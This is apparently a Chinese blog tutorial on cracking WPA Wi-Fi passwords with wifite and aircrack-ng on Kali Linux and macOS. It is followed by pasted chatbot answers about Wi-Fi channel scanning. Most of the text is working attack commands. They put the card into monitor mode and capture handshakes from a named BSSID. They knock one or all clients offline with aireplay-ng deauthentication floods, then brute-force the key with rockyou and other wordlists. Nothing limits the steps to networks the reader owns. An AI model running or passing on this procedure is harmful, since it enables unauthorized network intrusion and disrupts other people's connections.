admin管理员组

文章数量:1619748

1 工具1-wifite

sudo -i

切换到root终端,执行wifite

Ctrl+C 停止WIFI列表扫描

这里选择目标1,他会先监听客户端和wifi的连接的数据包,然后用wordlist-probable.txt里面的字典进行报破

区别 WPS 是 no 的和yes

no会自动化报破

这种模式默认下使用的字典是/usr/share/dict/wordlist-probable.txt

和执行如下命令效果一样

aircrack-ng -w /usr/share/dict/wordlist-probable.txt  ~/hs/handshake_Adc_12-96-A8-65-BE-A6_2023-05-03T01-03-06.cap

 yes

登他跑完后,使用

aircrack-ng -w /usr/share/dict/wordlist-probable.txt  ~/hs/xxx.cap

进行爆破或者换更强大的字典

2 工具2-Aircrack-ng

sudo -i

查看网卡信息

iwconfig

 ifconfig

 杀死冲突进程

airmon-ng check kill

查看是否识别到网卡

airmon-ng 

开始网卡监听

airmon-ng start wlan0

此时执行iwconfig,可以看到网卡信息发生了变化

搜索附近的热点

airodump-ng wlan0mon

 CTRL+Z结束搜索

抓数据包

执行如下命令监听握手包

airodump-ng -c (频道号) --bssid (MAC地址) -w (抓取的数据包的保存位置) wlan0mon

airodump-ng -c 6 --bssid 12:96:A8:65:BE:A6 -w ./1/ wlan0mon

 CTRL+C结束

可以看到当前的握手包

强制踢下线

打开新终端执行

这里的STATION就是 抓数据包这一步中的STATION信息

aireplay-ng -o 2 -a BSSID(MAC地址)-c STATION wlan0mon

aireplay-ng -0 2 -a 12:96:A8:65:BE:A6 -c F4:30:8B:E6:3A:CA wlan0mon

aireplay-ng --deauth 5 -a 12:96:A8:65:BE:A6 -c F4:30:8B:E6:3A:CA wlan0mon

执行后就可以看到原终端抓到的握手包

全部提下线

aireplay -0 0 -a 12:96:A8:65:BE:A6 wlan0mon

以上命令参数

-0表示发起deauthentication攻击
-a指定无线路由器BSSID
-c指定强制断开的设备

爆破

aircrack-ng -w /usr/share/dict/wordlist-probable.txt ~/hs/xxx.cap

或者

aircrack-ng -a2 -b 12:96:A8:65:BE:A6 -w /usr/share/wordlists/rockyou.txt 1-01.cap

命令行参数

a2:WPA的握手包
b :破解的WIFI的BSSID
w :指定字典文件
* :.cap是抓取到握手包的数据包文件

字典解压,进入/usr/share/wordlists

gzip -d rockyou.txt.gz

关闭网卡监听

airmon-ng stop wlan0mon

启动网络管理

systemctl start NetworkManager 

MACOS

brew install aircrack-ng
 

brew install autoconf automake libtool openssl shtool pkg-config hwloc pcre sqlite3 libpcap cmocka 

配置环境变量

/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/ 

执行

sudo airport -s 

列出wifi

开始监听

6为目标信道

sudo airport sniff 6

默认会走你当前无线网卡,此时你网卡的状态会断网,变成了监视模式

CTR+C暂停后,使用如下命令爆破

aircrack-ng -w dic.txt /tmp/airportSniff*.cap

发现抓到一个握手包

GPT解惑

1 我在使用Airodump-ng扫描wifi列表时,怎么只扫到了channel 14以下的wifi列表 

回答

Airodump-ng 可以扫描所有 2.4GHz 频段中的无线网络,包括范围为 1-14 的信道。如果你只扫描到了 channel 14 以下的 Wi-Fi 列表,则有可能是因为以下原因导致:

    国家或地区限制:某些国家或地区可能会限制使用高于 channel 13 的 Wi-Fi 信道,因此在这些地区,Wi-Fi 路由器通常只会使用 1-13 之间的信道。如果你所在的地区受到这种限制,那么 Airodump-ng 工具只能扫描到 14 以下的 Wi-Fi 列表。

    适配器或驱动程序限制:如果你的 Wi-Fi 适配器或驱动程序不支持扫描高于 channel 14 的 Wi-Fi 信道,那么 Airodump-ng 工具也无法扫描到这些信道。在这种情况下,你可以尝试升级适配器或驱动程序,或者使用其他适配器和驱动程序来解决问题。

需要注意的是,在某些情况下,即使 Airodump-ng 工具扫描不到一个特定的 Wi-Fi 列表,该 Wi-Fi 网络仍然可能存在并且正常运行。如果你确定某个 Wi-Fi 网络存在,但 Airodump-ng 工具无法扫描到该网络,可以尝试使用其他 Wi-Fi 工具来进行扫描和分析。

2 Airodump-ng 支持多少信道的扫描

Airodump-ng 工具支持扫描 2.4GHz 和 5GHz 无线网络的所有信道,具体取决于你的 Wi-Fi 网络适配器和驱动程序的支持情况。

对于 2.4GHz 无线网络,Airodump-ng 可以扫描范围为 1-14 的所有信道。对于 5GHz 无线网络,Airodump-ng 可以扫描包括 DFS(Dynamic Frequency Selection)在内的所有信道,通常是 36-165 范围内的信道。

需要注意的是,不同的国家或地区可能有不同的无线电频谱规定,因此 Airodump-ng 在某些地区可能无法扫描到所有信道。另外,在使用 Airodump-ng 进行 Wi-Fi 嗅探和数据包捕获时,应该遵守相关的法律法规和道德标准,不要侵犯他人隐私权。

3 Airodump-ng 可以扫描到类似于"channel: 52,1"这种信道的BSSID吗?

Airodump-ng 工具可以扫描到类似于 "channel: 52,1" 这种信道的 BSSID。在这种情况下,BSSID 包括了两个频段的信息,分别是 5GHz 的 52 频道和 2.4GHz 的 1 频道。

当 Airodump-ng 工具扫描到这样的 BSSID 时,它会显示当前 Wi-Fi 网络使用的所有频段以及相关的参数,如信号强度、数据传输速率等信息。你可以通过查看这些参数来判断当前 Wi-Fi 网络的性能和状态,并做出相应的优化或调整。

需要注意的是,如果你想要更加深入地了解 Wi-Fi 网络的详细信息,可以结合使用其他工具,如 Wireshark、Kismet 等。这些工具可以提供更加全面和细致的网络数据包捕获和分析功能,以帮助用户更好地理解和优化 Wi-Fi 网络。

4  有没有遇到过同一ESSID对应不同BSSID

是的,在某些情况下,同一ESSID可能会对应不同的BSSID,这通常是由于Wi-Fi网络被配置为使用多个接入点(AP)或使用了Mesh技术导致的。每个AP都有一个唯一的BSSID,但它们共享相同的ESSID,因此客户端设备可以无缝地切换到最强的信号。

在使用Wifite等工具进行Wi-Fi扫描时,由于同一ESSID对应多个BSSID的情况比较常见,工具会尝试列出所有BSSID和其相关信息,并让用户选择连接哪个AP。在选择连接AP时,通常建议选择信号最强的AP,以获得更好的网络体验。

 

参考:

wifite

https://wwwblogs/obitoma/p/14926022.html

https://blog.csdn/qq_38376348/article/details/130472085

aircrack-ng

Wi-Fi deauthentication attacks using aireplay-ng

Kali系统使用Aircrack-ng进行暴力破解WIFI密码 - 简书

简单wifi破解 - 腾讯云开发者社区-腾讯云

mac版本

Mac上使用aircrack-ng破解Wi-Fi密码 – NotAlone, U Are!

macOS上使用aircrack-ng暴力破解Wi-Fi密码_aircrack-ng mac_Kant101的博客-CSDN博客

本文标签: 入门wifi